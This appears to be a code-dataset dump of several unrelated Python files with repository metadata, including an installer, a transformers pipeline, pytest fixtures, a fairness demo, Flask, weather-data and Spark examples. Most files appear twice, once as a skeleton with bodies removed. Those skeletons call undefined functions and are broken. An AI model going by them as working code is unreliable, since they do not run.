set "PATH={python_path.parent};%PATH%"
{python_path} -m pip install --upgrade tdcsm
cd "{work_dir}"
tdcsm gui
""")
    else:
        locations = [work_dir, home / "Desktop"]
        # macOS Finder runs '.command' files; plain '.sh' elsewhere.
        sfx = 'command' if system() == 'Darwin' else 'sh'
        tdcsm_cmd = dedent(f"""\
#! /bin/sh
export PATH="{python_path.parent}:$PATH"
{python_path} -m pip install --upgrade tdcsm
cd "{work_dir}"
tdcsm gui
""")
    # chmod +x for user/group/other so the shortcut is executable.
    exec_bits = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
    for location in locations:
        shortcut = location / f"tdcsm-cmd.{sfx}"
        with shortcut.open("w") as fh:
            fh.write(tdcsm_cmd)
        shortcut.chmod(shortcut.stat().st_mode | exec_bits)
    print("done", end='')
def main():
    """Run the installer end to end: interpreter check, venv, tdcsm, shortcuts."""
    check_python()
    create_venv()
    install_tdcsm()
    create_shortcut()
if __name__ == "__main__":
main()
| 1,868 | 0 | 161 |
4ae41ad49a05e26b0de3bd974202ec219d774141 | 3,657 | py | Python | psycho_embeddings/feature_extractor.py | MilaNLProc/psycho-embeddings | 2182076c1d455f8881858f0180852fe8a288f9b4 | [
"MIT"
] | null | null | null | psycho_embeddings/feature_extractor.py | MilaNLProc/psycho-embeddings | 2182076c1d455f8881858f0180852fe8a288f9b4 | [
"MIT"
] | null | null | null | psycho_embeddings/feature_extractor.py | MilaNLProc/psycho-embeddings | 2182076c1d455f8881858f0180852fe8a288f9b4 | [
"MIT"
] | null | null | null | from typing import Dict
from transformers.pipelines.base import GenericTensor, Pipeline
class NewFeatureExtractionPipeline(Pipeline):
"""
Feature extraction pipeline using no model head. This pipeline extracts the hidden states from the base
transformer, which can be used as features in downstream tasks.
This feature extraction pipeline can currently be loaded from [`pipeline`] using the task identifier:
`"feature-extraction"`.
All models may be used for this pipeline. See a list of all models, including community-contributed models on
[huggingface.co/models](https://huggingface.co/models).
Arguments:
model ([`PreTrainedModel`] or [`TFPreTrainedModel`]):
The model that will be used by the pipeline to make predictions. This needs to be a model inheriting from
[`PreTrainedModel`] for PyTorch and [`TFPreTrainedModel`] for TensorFlow.
tokenizer ([`PreTrainedTokenizer`]):
The tokenizer that will be used by the pipeline to encode data for the model. This object inherits from
[`PreTrainedTokenizer`].
modelcard (`str` or [`ModelCard`], *optional*):
Model card attributed to the model for this pipeline.
framework (`str`, *optional*):
The framework to use, either `"pt"` for PyTorch or `"tf"` for TensorFlow. The specified framework must be
installed.
If no framework is specified, will default to the one currently installed. If no framework is specified and
both frameworks are installed, will default to the framework of the `model`, or to PyTorch if no model is
provided.
task (`str`, defaults to `""`):
A task-identifier for the pipeline.
args_parser ([`~pipelines.ArgumentHandler`], *optional*):
Reference to the object in charge of parsing supplied pipeline parameters.
device (`int`, *optional*, defaults to -1):
Device ordinal for CPU/GPU supports. Setting this to -1 will leverage CPU, a positive will run the model on
the associated CUDA device id.
"""
def __call__(self, *args, **kwargs):
"""
Extract the features of the input(s).
Args:
args (`str` or `List[str]`): One or several texts (or one list of texts) to get the features of.
Return:
A nested list of `float`: The features computed by the model.
"""
return super().__call__(*args, **kwargs)
| 48.118421 | 119 | 0.655182 | from typing import Dict
from transformers.pipelines.base import GenericTensor, Pipeline
class NewFeatureExtractionPipeline(Pipeline):
    """
    Feature extraction pipeline using no model head. This pipeline extracts the hidden states from the base
    transformer, which can be used as features in downstream tasks.
    This feature extraction pipeline can currently be loaded from [`pipeline`] using the task identifier:
    `"feature-extraction"`.
    All models may be used for this pipeline. See a list of all models, including community-contributed models on
    [huggingface.co/models](https://huggingface.co/models).
    Arguments:
        model ([`PreTrainedModel`] or [`TFPreTrainedModel`]):
            The model that will be used by the pipeline to make predictions. This needs to be a model inheriting from
            [`PreTrainedModel`] for PyTorch and [`TFPreTrainedModel`] for TensorFlow.
        tokenizer ([`PreTrainedTokenizer`]):
            The tokenizer that will be used by the pipeline to encode data for the model. This object inherits from
            [`PreTrainedTokenizer`].
        modelcard (`str` or [`ModelCard`], *optional*):
            Model card attributed to the model for this pipeline.
        framework (`str`, *optional*):
            The framework to use, either `"pt"` for PyTorch or `"tf"` for TensorFlow. The specified framework must be
            installed.
            If no framework is specified, will default to the one currently installed. If no framework is specified and
            both frameworks are installed, will default to the framework of the `model`, or to PyTorch if no model is
            provided.
        task (`str`, defaults to `""`):
            A task-identifier for the pipeline.
        args_parser ([`~pipelines.ArgumentHandler`], *optional*):
            Reference to the object in charge of parsing supplied pipeline parameters.
        device (`int`, *optional*, defaults to -1):
            Device ordinal for CPU/GPU supports. Setting this to -1 will leverage CPU, a positive will run the model on
            the associated CUDA device id.
        layer (`int`):
            Index into the model output's `hidden_states` selecting which layer's
            activations to return.
    """

    def __init__(self, layer, **kwargs):
        # Which entry of `hidden_states` postprocess() returns.
        self.layer = layer
        super().__init__(**kwargs)

    def _sanitize_parameters(self, truncation=None, **kwargs):
        # Route `truncation` to the preprocess step; no forward/postprocess params.
        preprocess_params = {}
        if truncation is not None:
            preprocess_params["truncation"] = truncation
        return preprocess_params, {}, {}

    def preprocess(self, inputs, truncation=None) -> Dict[str, GenericTensor]:
        # Tokenize into tensors native to the active framework ("pt" or "tf").
        return_tensors = self.framework
        if truncation is None:
            kwargs = {}
        else:
            kwargs = {"truncation": truncation}
        model_inputs = self.tokenizer(inputs, return_tensors=return_tensors, **kwargs)
        return model_inputs

    def _forward(self, model_inputs):
        model_outputs = self.model(**model_inputs)
        return model_outputs

    def postprocess(self, model_outputs):
        # Both torch and TF tensors expose `.numpy()`, so the original
        # per-framework branches were byte-identical and are merged here.
        # NOTE(review): indexing `model_outputs["hidden_states"]` assumes the
        # model is configured to emit hidden states (output_hidden_states) --
        # confirm at pipeline construction time.
        if self.framework in ("pt", "tf"):
            return model_outputs["hidden_states"][self.layer].numpy().tolist()

    def __call__(self, *args, **kwargs):
        """
        Extract the features of the input(s).
        Args:
            args (`str` or `List[str]`): One or several texts (or one list of texts) to get the features of.
        Return:
            A nested list of `float`: The features computed by the model.
        """
        return super().__call__(*args, **kwargs)
| 1,016 | 0 | 135 |
b5dbb0b0bcee643f1fd34734165384f8ac4f6dea | 5,494 | py | Python | tests/app/conftest.py | ZackPashkin/toloka-kit | 8f650e5d8cdded1949ca633cf78f9b851ce839bb | [
"Apache-2.0"
] | 153 | 2021-02-06T13:41:11.000Z | 2022-03-19T17:51:01.000Z | tests/app/conftest.py | ZackPashkin/toloka-kit | 8f650e5d8cdded1949ca633cf78f9b851ce839bb | [
"Apache-2.0"
] | 29 | 2021-01-15T12:54:37.000Z | 2022-02-07T07:45:32.000Z | tests/app/conftest.py | ZackPashkin/toloka-kit | 8f650e5d8cdded1949ca633cf78f9b851ce839bb | [
"Apache-2.0"
] | 17 | 2021-01-29T15:20:04.000Z | 2022-01-30T07:21:03.000Z | import pytest
from decimal import Decimal
@pytest.fixture
@pytest.fixture
@pytest.fixture
@pytest.fixture
@pytest.fixture
@pytest.fixture
| 29.223404 | 61 | 0.328176 | import pytest
from decimal import Decimal
@pytest.fixture
def app_map():
    """Raw JSON-like payload of an App, as the test suite expects it from the API."""
    return {
        'constraints_description': 'constraints description',
        # NOTE(review): Decimal(0.1) carries binary-float noise
        # (0.1000000000000000055...); Decimal('0.1') may be the intended
        # exact value -- confirm against the client's response parsing.
        'default_item_price': Decimal(0.1),
        'description': 'app description',
        'examples': {},
        'id': '123',
        'image': 'image',
        # Input schema: per-field type/required/hidden flags.
        'input_spec': {
            'id': {
                'type': 'string',
                'required': False,
                'hidden': False
            },
            'text': {
                'type': 'string',
                'required': True,
                'hidden': False
            }
        },
        'name': 'app name',
        # Output schema, mirroring the input_spec structure.
        'output_spec': {
            'result': {
                'type': 'array_string',
                'required': True,
                'hidden': False
            },
            'confidence': {
                'type': 'float',
                'required': False,
                'hidden': False
            }
        },
        # JSON-schema-like description of the App's configurable parameters.
        'param_spec': {
            'fields': {
                'required': [
                    'default_language',
                    'name',
                    'instruction_text2_label',
                    'option_multiple_choice',
                    'option_other',
                    'instruction_classes',
                    'instruction_examples',
                    'instruction_intro'
                ],
                'properties': {
                    'name': {
                        'type': 'string'
                    },
                    'option_other': {
                        'type': 'boolean'
                    },
                    'default_language': {
                        'type': 'string'
                    },
                    'instruction_intro': {
                        'type': 'string'
                    },
                    'instruction_classes': {
                        'type': 'array',
                        'items': {
                            'type': 'object',
                            'required': [
                                'label',
                                'description',
                                'value'
                            ],
                            'properties': {
                                'label': {
                                    'type': 'string'
                                },
                                'value': {
                                    'type': 'string'
                                },
                                'description': {
                                    'type': 'string'
                                }
                            }
                        }
                    },
                    'instruction_examples': {
                        'type': 'array',
                        'items': {
                            'type': 'object',
                            'required': [
                                'description',
                                'label',
                                'text'
                            ],
                            'properties': {
                                'label': {
                                    'type': 'string'
                                },
                                'text': {
                                    'type': 'string'
                                },
                                'description': {
                                    'type': 'string'
                                }
                            }
                        }
                    },
                    'option_multiple_choice': {
                        'type': 'boolean'
                    },
                    # NOTE(review): 'required' above lists 'instruction_text2_label',
                    # but only 'instruction_text_label' is declared here -- looks like
                    # a typo carried over from a sample payload; verify.
                    'instruction_text_label': {
                        'type': 'string'
                    },
                }
            }
        },
    }
@pytest.fixture
def app_project_map():
    """Minimal App-project creation request payload."""
    return {
        'app_id': '123',
        # Empty string -- presumably "no parent project"; verify against the API.
        'parent_app_project_id': '',
        'name': 'ah-create-test',
        'parameters': {
            'name': 'ah-create-test'
        }
    }
@pytest.fixture
def app_project_map_with_readonly(app_project_map):
    """App-project payload extended with the server-assigned read-only fields."""
    server_fields = {
        'id': '123',
        'status': 'READY',
        'created': '2021-09-29T15:13:38.491000',
        'errors': [],
        'item_price': 0.0000,
        'read_only': False,
    }
    return {**app_project_map, **server_fields}
@pytest.fixture
def app_item_map():
    """App-item creation request payload: target batch id plus the raw input record."""
    return {
        'batch_id': '123',
        'input_data': {
            'id': '124',
            'text': 'I smell bad after the last night.'
        }
    }
@pytest.fixture
def app_item_map_with_readonly(app_item_map):
    """App-item payload extended with server-assigned status, output and timestamps."""
    server_fields = {
        'id': '123',
        'app_project_id': '123',
        'status': 'COMPLETED',
        'output_data': {
            'result': 'correct',
            # NOTE(review): Decimal(0.82) inherits float noise; Decimal('0.82')
            # may be the intended exact value -- verify.
            'confidence': Decimal(0.82)
        },
        'created_at': '2021-09-28T15:56:25.193000',
        'started_at': '2021-09-28T15:56:30.309920',
        'finished_at': '2021-09-28T16:07:12.307169',
    }
    return {**app_item_map, **server_fields}
@pytest.fixture
def app_batch_map():
    """Full App-batch payload, including server-assigned counters and timestamps."""
    return {
        'id': '123',
        'app_project_id': '123',
        'status': 'COMPLETED',
        'name': '1000-items',
        'items_count': 1000,
        'item_price': 0.0000,
        'cost': 0.0000,
        'created_at': '2021-09-28T15:56:25.193000',
        'started_at': '2021-09-28T15:56:30.201000',
        'finished_at': '2021-09-28T16:07:13.400000',
        'read_only': False
    }
| 5,212 | 0 | 132 |
18496a724ec7f11294f3696d4522309779f5f9f2 | 3,829 | py | Python | fairness/algorithms/zafar/fair-classification-master/disparate_mistreatment/synthetic_data_demo/decision_boundary_demo.py | yashwarlord/fairness-comparison | 366a4e4bb70498ac7498e4a98f50e3585f7881d3 | [
"Apache-2.0"
] | 146 | 2018-02-14T20:59:29.000Z | 2022-03-26T00:44:28.000Z | fairness/algorithms/zafar/fair-classification-master/disparate_mistreatment/synthetic_data_demo/decision_boundary_demo.py | yashwarlord/fairness-comparison | 366a4e4bb70498ac7498e4a98f50e3585f7881d3 | [
"Apache-2.0"
] | 6 | 2018-03-15T01:39:53.000Z | 2021-11-15T17:47:02.000Z | fairness/algorithms/zafar/fair-classification-master/disparate_mistreatment/synthetic_data_demo/decision_boundary_demo.py | yashwarlord/fairness-comparison | 366a4e4bb70498ac7498e4a98f50e3585f7881d3 | [
"Apache-2.0"
] | 50 | 2018-02-16T15:27:29.000Z | 2022-03-01T08:59:28.000Z | import os,sys
import numpy as np
from generate_synthetic_data import *
sys.path.insert(0, '../../fair_classification/') # the code for fair classification is in this directory
import utils as ut
import funcs_disp_mist as fdm
import plot_syn_boundaries as psb
def test_synthetic_data():
""" Generate the synthetic data """
data_type = 1
X, y, x_control = generate_synthetic_data(data_type=data_type, plot_data=True) # set plot_data to False to skip the data plot
sensitive_attrs = x_control.keys()
""" Split the data into train and test """
train_fold_size = 0.5
x_train, y_train, x_control_train, x_test, y_test, x_control_test = ut.split_into_train_test(X, y, x_control, train_fold_size)
cons_params = None # constraint parameters, will use them later
loss_function = "logreg" # perform the experiments with logistic regression
EPS = 1e-4
""" Classify the data while optimizing for accuracy """
print
print "== Unconstrained (original) classifier =="
w_uncons, acc_uncons, s_attr_to_fp_fn_test_uncons = train_test_classifier()
print "\n-----------------------------------------------------------------------------------\n"
""" Now classify such that we optimize for accuracy while achieving perfect fairness """
print
print "== Classifier with fairness constraint =="
print "\n\n=== Constraints on FPR ===" # setting parameter for constraints
cons_type = 1 # FPR constraint -- just change the cons_type, the rest of parameters should stay the same
tau = 5.0
mu = 1.2
sensitive_attrs_to_cov_thresh = {"s1": {0:{0:0, 1:0}, 1:{0:0, 1:0}, 2:{0:0, 1:0}}} # zero covariance threshold, means try to get the fairest solution
cons_params = {"cons_type": cons_type,
"tau": tau,
"mu": mu,
"sensitive_attrs_to_cov_thresh": sensitive_attrs_to_cov_thresh}
w_cons, acc_cons, s_attr_to_fp_fn_test_cons = train_test_classifier()
psb.plot_boundaries(X, y, x_control, [w_uncons, w_cons], [acc_uncons, acc_cons], [s_attr_to_fp_fn_test_uncons["s1"], s_attr_to_fp_fn_test_cons["s1"]], "img/syn_cons_dtype_%d_cons_type_%d.png"%(data_type, cons_type) )
print "\n-----------------------------------------------------------------------------------\n"
print "\n\n=== Constraints on FNR ==="
cons_type = 2
cons_params["cons_type"] = cons_type # FNR constraint -- just change the cons_type, the rest of parameters should stay the same
w_cons, acc_cons, s_attr_to_fp_fn_test_cons = train_test_classifier()
psb.plot_boundaries(X, y, x_control, [w_uncons, w_cons], [acc_uncons, acc_cons], [s_attr_to_fp_fn_test_uncons["s1"], s_attr_to_fp_fn_test_cons["s1"]], "img/syn_cons_dtype_%d_cons_type_%d.png"%(data_type, cons_type) )
print "\n-----------------------------------------------------------------------------------\n"
print "\n\n=== Constraints on both FPR and FNR ==="
cons_type = 4
cons_params["cons_type"] = cons_type # both FPR and FNR constraints
w_cons, acc_cons, s_attr_to_fp_fn_test_cons = train_test_classifier()
psb.plot_boundaries(X, y, x_control, [w_uncons, w_cons], [acc_uncons, acc_cons], [s_attr_to_fp_fn_test_uncons["s1"], s_attr_to_fp_fn_test_cons["s1"]], "img/syn_cons_dtype_%d_cons_type_%d.png"%(data_type, cons_type) )
print "\n-----------------------------------------------------------------------------------\n"
return
if __name__ == '__main__':
main() | 44.011494 | 217 | 0.68608 | import os,sys
import numpy as np
from generate_synthetic_data import *
sys.path.insert(0, '../../fair_classification/') # the code for fair classification is in this directory
import utils as ut
import funcs_disp_mist as fdm
import plot_syn_boundaries as psb
def test_synthetic_data():
""" Generate the synthetic data """
data_type = 1
X, y, x_control = generate_synthetic_data(data_type=data_type, plot_data=True) # set plot_data to False to skip the data plot
sensitive_attrs = x_control.keys()
""" Split the data into train and test """
train_fold_size = 0.5
x_train, y_train, x_control_train, x_test, y_test, x_control_test = ut.split_into_train_test(X, y, x_control, train_fold_size)
cons_params = None # constraint parameters, will use them later
loss_function = "logreg" # perform the experiments with logistic regression
EPS = 1e-4
def train_test_classifier():
w = fdm.train_model_disp_mist(x_train, y_train, x_control_train, loss_function, EPS, cons_params)
train_score, test_score, cov_all_train, cov_all_test, s_attr_to_fp_fn_train, s_attr_to_fp_fn_test = fdm.get_clf_stats(w, x_train, y_train, x_control_train, x_test, y_test, x_control_test, sensitive_attrs)
# accuracy and FPR are for the test because we need of for plotting
return w, test_score, s_attr_to_fp_fn_test
""" Classify the data while optimizing for accuracy """
print
print "== Unconstrained (original) classifier =="
w_uncons, acc_uncons, s_attr_to_fp_fn_test_uncons = train_test_classifier()
print "\n-----------------------------------------------------------------------------------\n"
""" Now classify such that we optimize for accuracy while achieving perfect fairness """
print
print "== Classifier with fairness constraint =="
print "\n\n=== Constraints on FPR ===" # setting parameter for constraints
cons_type = 1 # FPR constraint -- just change the cons_type, the rest of parameters should stay the same
tau = 5.0
mu = 1.2
sensitive_attrs_to_cov_thresh = {"s1": {0:{0:0, 1:0}, 1:{0:0, 1:0}, 2:{0:0, 1:0}}} # zero covariance threshold, means try to get the fairest solution
cons_params = {"cons_type": cons_type,
"tau": tau,
"mu": mu,
"sensitive_attrs_to_cov_thresh": sensitive_attrs_to_cov_thresh}
w_cons, acc_cons, s_attr_to_fp_fn_test_cons = train_test_classifier()
psb.plot_boundaries(X, y, x_control, [w_uncons, w_cons], [acc_uncons, acc_cons], [s_attr_to_fp_fn_test_uncons["s1"], s_attr_to_fp_fn_test_cons["s1"]], "img/syn_cons_dtype_%d_cons_type_%d.png"%(data_type, cons_type) )
print "\n-----------------------------------------------------------------------------------\n"
print "\n\n=== Constraints on FNR ==="
cons_type = 2
cons_params["cons_type"] = cons_type # FNR constraint -- just change the cons_type, the rest of parameters should stay the same
w_cons, acc_cons, s_attr_to_fp_fn_test_cons = train_test_classifier()
psb.plot_boundaries(X, y, x_control, [w_uncons, w_cons], [acc_uncons, acc_cons], [s_attr_to_fp_fn_test_uncons["s1"], s_attr_to_fp_fn_test_cons["s1"]], "img/syn_cons_dtype_%d_cons_type_%d.png"%(data_type, cons_type) )
print "\n-----------------------------------------------------------------------------------\n"
print "\n\n=== Constraints on both FPR and FNR ==="
cons_type = 4
cons_params["cons_type"] = cons_type # both FPR and FNR constraints
w_cons, acc_cons, s_attr_to_fp_fn_test_cons = train_test_classifier()
psb.plot_boundaries(X, y, x_control, [w_uncons, w_cons], [acc_uncons, acc_cons], [s_attr_to_fp_fn_test_uncons["s1"], s_attr_to_fp_fn_test_cons["s1"]], "img/syn_cons_dtype_%d_cons_type_%d.png"%(data_type, cons_type) )
print "\n-----------------------------------------------------------------------------------\n"
return
def main():
test_synthetic_data()
if __name__ == '__main__':
main() | 447 | 0 | 47 |
7d1f457eda8d5e9c802cfb9bf88971d19416931d | 672 | py | Python | app.py | labulel/web-scraping-challenge | 02f5b49b99802ec018a1451387d4a5cba538213c | [
"Apache-2.0"
] | null | null | null | app.py | labulel/web-scraping-challenge | 02f5b49b99802ec018a1451387d4a5cba538213c | [
"Apache-2.0"
] | null | null | null | app.py | labulel/web-scraping-challenge | 02f5b49b99802ec018a1451387d4a5cba538213c | [
"Apache-2.0"
] | null | null | null | from flask import Flask, render_template, redirect
from flask_pymongo import PyMongo
import scrape_mars
app = Flask(__name__)
#use flask_pymongo to set up mongo connection
app.config ["MONGO_URI"] = "mongodb://localhost:27017/mars_app"
mongo = PyMongo(app)
@app.route("/")
@app.route("/scrape")
if __name__ =="__main__":
app.run(debug = True)
| 24.888889 | 63 | 0.696429 | from flask import Flask, render_template, redirect
from flask_pymongo import PyMongo
import scrape_mars
app = Flask(__name__)
#use flask_pymongo to set up mongo connection
app.config ["MONGO_URI"] = "mongodb://localhost:27017/mars_app"
mongo = PyMongo(app)
@app.route("/")
def index():
#Find Mars data
Mars = mongo.db.data.find_one()
#Return the result on home page
return render_template("index.html", data = Mars)
@app.route("/scrape")
def scraper():
Mars = mongo.db.data
Mars_data = scrape_mars.scrape()
Mars.update({}, Mars_data, upsert = True)
return redirect("/", code = 302)
if __name__ =="__main__":
app.run(debug = True)
| 276 | 0 | 44 |
3e7fdd30f2753e8e86e5f06e72426a7a4a2ba883 | 3,669 | py | Python | operators/teched21/unzip/script.py | thhapke/dilocal | 1d3c1b7b1a4513e9bff7efd77f680f66014ff499 | [
"MIT"
] | null | null | null | operators/teched21/unzip/script.py | thhapke/dilocal | 1d3c1b7b1a4513e9bff7efd77f680f66014ff499 | [
"MIT"
] | null | null | null | operators/teched21/unzip/script.py | thhapke/dilocal | 1d3c1b7b1a4513e9bff7efd77f680f66014ff499 | [
"MIT"
] | null | null | null | # For local development
#from utils.mock_di_api import mock_api
#api = mock_api(__file__,False)
import pandas as pd
import copy
import zipfile
import re
import io
from datetime import datetime
CREATE_SQL = False
api.set_port_callback('input',on_input) # datatype: message
| 40.318681 | 133 | 0.624693 | # For local development
#from utils.mock_di_api import mock_api
#api = mock_api(__file__,False)
import pandas as pd
import copy
import zipfile
import re
import io
from datetime import datetime
CREATE_SQL = False
def on_input(msg) :
api.logger.info('Unzip: {}'.format(msg.attributes['zipfile']))
try :
with zipfile.ZipFile(io.BytesIO(msg.body)) as zipp :
dwd_files = zipp.namelist()
r = re.compile("produkt_klima_tag.+\.txt")
datafile = list(filter(r.match, dwd_files))[0]
datastr = zipp.read(datafile).decode('latin-1')
except zipfile.BadZipFile as bzf:
print(str(bzf))
api.logger.warning('Bad zip file: \"{}\" ({})'.format(msg.attributes['zipfile'],str(bzf)))
return -1
data = datastr.split('\n')
recs = [ [rd.strip() for rd in d.split(';') ] for d in data]
map_col = {'STATIONS_ID': 'STATIONS_ID', 'MESS_DATUM': 'MEASUREMENT_DATE', 'QN_3': 'QUALITY_LEVEL_3', 'FX': 'MAX_WINDGUST',
'FM': 'MEAN_WIND_VELOCITY', 'QN4': 'QUALITY_LEVEL_4', 'RSK': 'PRECIPITATION_HEIGHT',
'RSKF': 'PRECIPITATION_TYPE', 'SDK': 'SUN_DURATION', 'SHK_TAG': 'SNOW_DEPTH', 'NM': 'CLOUD_COVER',
'VPM': 'VAPOR_PRESSURE', 'PM': 'MEAN_PRESSURE', 'TMK': 'MEAN_TEMPERATURE', 'UPM': 'MEAN_REL_HUMIDITY',
'TXK': 'MAX_TEMPERATURE', 'TNK': 'MIN_TEMPERATURE', 'TGK': 'MIN_AIR_TEMPERATURE', 'eor': 'EOR'}
col_type = {'STATIONS_ID': 'integer', 'MEASUREMENT_DATE': 'timestamp', 'MAX_WINDGUST':'float',
'MEAN_WIND_VELOCITY':'float','PRECIPITATION_HEIGHT':'float',
'PRECIPITATION_TYPE':'integer','SUN_DURATION':'float','SNOW_DEPTH':'float','CLOUD_COVER':'float',
'VAPOR_PRESSURE':'float', 'MEAN_PRESSURE':'float','MEAN_TEMPERATURE':'float', 'MEAN_REL_HUMIDITY':'float',
'MAX_TEMPERATURE':'float', 'MIN_TEMPERATURE':'float','MIN_AIR_TEMPERATURE':'float'}
df = pd.DataFrame(recs[1:],columns=map_col.values())
df.drop(columns=['EOR','QUALITY_LEVEL_3','QUALITY_LEVEL_4'],inplace=True)
for col in df.columns :
if col == 'MEASUREMENT_DATE' :
df['MEASUREMENT_DATE'] = pd.to_datetime(df['MEASUREMENT_DATE'],format='%Y%m%d')
else :
df[col] = pd.to_numeric(df[col])
df.replace(-999,pd.NA,inplace=True)
df.dropna(axis=0,thresh=3,inplace=True)
df.fillna(-999,inplace=True)
#df.dropna(axis=1,how='any',inplace=True)
#df.replace('-999',pd.NA,inplace=True)
#df['MEASUREMENT_DATE'] = df['MEASUREMENT_DATE'].apply(lambda x: datetime.strptime(x,'%Y%m%d').strftime('%Y-%m-%d %H:%M:%S.%f0'))
# ONLY USED for dev
if CREATE_SQL :
schema = 'DEVICES'
table_name = 'DAILY_WEATHER'
sql_str = f"CREATE COLUMN TABLE {schema}.{table_name} (\n"
for col in df.columns :
data_type = col_type[col]
sql_str += f'\"{col}\" {data_type}, \n'
sql_str += "PRIMARY KEY (STATIONS_ID,MEASUREMENT_DATE)"
sql_str += ')'
print(sql_str)
return 0
table_dict = {'version':1,'name':'DAILY_WEATHER','columns':list()}
for col in df.columns :
table_dict['columns'].append({'name':col,'class': col_type[col].lower()})
# Sending to outport output
att = copy.deepcopy(msg.attributes)
att['table'] = table_dict
df.fillna('', inplace=True)
table_data = df.values.tolist()
out_msg = api.Message(attributes=att,body=table_data)
api.logger.info(f'Send to DB ROW 0 : {table_data[0]}')
api.send('output',out_msg) # datatype: message
api.set_port_callback('input',on_input) # datatype: message
| 3,366 | 0 | 23 |
857067ba58d9c2f2c4f08cd9db43c47d2da1d464 | 1,663 | py | Python | geolimes.py | akirsche/geoLIMES | 09f0f93f244fcdf056ea870c2524af15d3d757db | [
"MIT"
] | null | null | null | geolimes.py | akirsche/geoLIMES | 09f0f93f244fcdf056ea870c2524af15d3d757db | [
"MIT"
] | null | null | null | geolimes.py | akirsche/geoLIMES | 09f0f93f244fcdf056ea870c2524af15d3d757db | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from json import JSONDecodeError, loads
from os import makedirs
from os.path import exists, isdir
from urllib.error import HTTPError
from cache import Cache
from config import Config, ConfigNotValidError, load_config
from logger import InfoLogger
from mapper import Mapper
from sparql import SPARQL
| 29.696429 | 130 | 0.644618 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from json import JSONDecodeError, loads
from os import makedirs
from os.path import exists, isdir
from urllib.error import HTTPError
from cache import Cache
from config import Config, ConfigNotValidError, load_config
from logger import InfoLogger
from mapper import Mapper
from sparql import SPARQL
class goeLIMES:
def __init__(self, database_config):
self.database_config = database_config
def run(self, config_json, to_file=True):
self.create_dirs()
results = None
try:
config = Config(config_json, self.database_config)
source_sparql = SPARQL(config, 'source')
target_sparql = SPARQL(config, 'target')
info_logger = InfoLogger('InfoLogger', '{}_{}'.format(source_sparql.get_query_hash(), target_sparql.get_query_hash()))
source_cache = Cache(info_logger, config, source_sparql, 'source')
source_cache.create_cache()
target_cache = Cache(info_logger, config, target_sparql, 'target')
target_cache.create_cache()
mapper = Mapper(info_logger, config, source_sparql, target_sparql)
results = mapper.map(to_file)
except ConfigNotValidError as e:
results = "Config not valid"
print(e)
except HTTPError as e:
print(e)
except JSONDecodeError as e:
print(e)
return results
def create_dirs(self):
if not exists('logs') or not isdir('logs'):
makedirs('logs')
if not exists('output') or not isdir('output'):
makedirs('output')
| 1,218 | -6 | 103 |
37eda14ffda685570b9da0c62550b975235a9f69 | 1,715 | py | Python | src/main/py/com/example/core/rdd/filter.py | brijeshdhaker/spark-python-examples | bb3504d21c073448c336c228f74449de68853b8d | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2021-07-18T16:23:56.000Z | 2021-07-18T16:23:56.000Z | src/main/py/com/example/core/rdd/filter.py | brijeshdhaker/spark-python-examples | bb3504d21c073448c336c228f74449de68853b8d | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/main/py/com/example/core/rdd/filter.py | brijeshdhaker/spark-python-examples | bb3504d21c073448c336c228f74449de68853b8d | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | #
import sys
import com.example.utils.commons as commons
from pyspark.sql import SparkSession
if __name__ == "__main__":
if len(sys.argv) != 1:
print("Usages: spark-file <in-path> <out-path>")
sys.exit(-1)
#
spark = SparkSession \
.builder \
.master("spark://spark-master:7077")\
.appName("PythonRDD-Filter") \
.getOrCreate()
data = [
("James", "Sales", "NY", 90000, 34, 10000),
("Kenith", "Marketing", "CA", 66000, 36, 40000),
("Michael", "Sales", "NY", 86000, 56, 20000),
("Robert", "Sales", "CA", 81000, 30, 23000),
("Maria", "Finance", "CA", 90000, 24, 23000),
("Raman", "Finance", "CA", 99000, 40, 24000),
("Scott", "Finance", "NY", 83000, 36, 19000),
("Jen", "Finance", "NY", 79000, 53, 15000),
("Jeff", "Marketing", "CA", 80000, 25, 18000),
("Shelly", "Marketing", "NY", 60000, 15, 18000),
("Kumar", "Marketing", "NY", 91000, 50, 21000)
]
rdd_1 = spark.sparkContext.parallelize(data)
print("RDD-1 Partition Count : %i " % (rdd_1.getNumPartitions()))
print("RDD-1 Record Count : %i " % (rdd_1.count()))
commons.print_separator()
rdd_2 = rdd_1.filter(lambda x: x[4] > 30)
print(rdd_2.collect())
print("RDD-2 Partition Count : %i " % (rdd_2.getNumPartitions()))
print("RDD-2 Record Count : %i " % (rdd_2.count()))
commons.print_separator()
rdd_3 = rdd_1.filter(m_filter)
print(rdd_3.collect())
print("RDD-3 Partition Count : %i " % (rdd_3.getNumPartitions()))
print("RDD-3 Record Count : %i " % (rdd_3.count()))
commons.print_separator()
print("Details available at http://localhost:4040")
#option = input("Do You Want to Kill Spark Job Process Y/N : ")
#
spark.stop()
| 28.583333 | 65 | 0.623324 | #
import sys
import com.example.utils.commons as commons
from pyspark.sql import SparkSession
if __name__ == "__main__":
if len(sys.argv) != 1:
print("Usages: spark-file <in-path> <out-path>")
sys.exit(-1)
def m_filter(element):
return element[4] > 30
#
spark = SparkSession \
.builder \
.master("spark://spark-master:7077")\
.appName("PythonRDD-Filter") \
.getOrCreate()
data = [
("James", "Sales", "NY", 90000, 34, 10000),
("Kenith", "Marketing", "CA", 66000, 36, 40000),
("Michael", "Sales", "NY", 86000, 56, 20000),
("Robert", "Sales", "CA", 81000, 30, 23000),
("Maria", "Finance", "CA", 90000, 24, 23000),
("Raman", "Finance", "CA", 99000, 40, 24000),
("Scott", "Finance", "NY", 83000, 36, 19000),
("Jen", "Finance", "NY", 79000, 53, 15000),
("Jeff", "Marketing", "CA", 80000, 25, 18000),
("Shelly", "Marketing", "NY", 60000, 15, 18000),
("Kumar", "Marketing", "NY", 91000, 50, 21000)
]
rdd_1 = spark.sparkContext.parallelize(data)
print("RDD-1 Partition Count : %i " % (rdd_1.getNumPartitions()))
print("RDD-1 Record Count : %i " % (rdd_1.count()))
commons.print_separator()
rdd_2 = rdd_1.filter(lambda x: x[4] > 30)
print(rdd_2.collect())
print("RDD-2 Partition Count : %i " % (rdd_2.getNumPartitions()))
print("RDD-2 Record Count : %i " % (rdd_2.count()))
commons.print_separator()
rdd_3 = rdd_1.filter(m_filter)
print(rdd_3.collect())
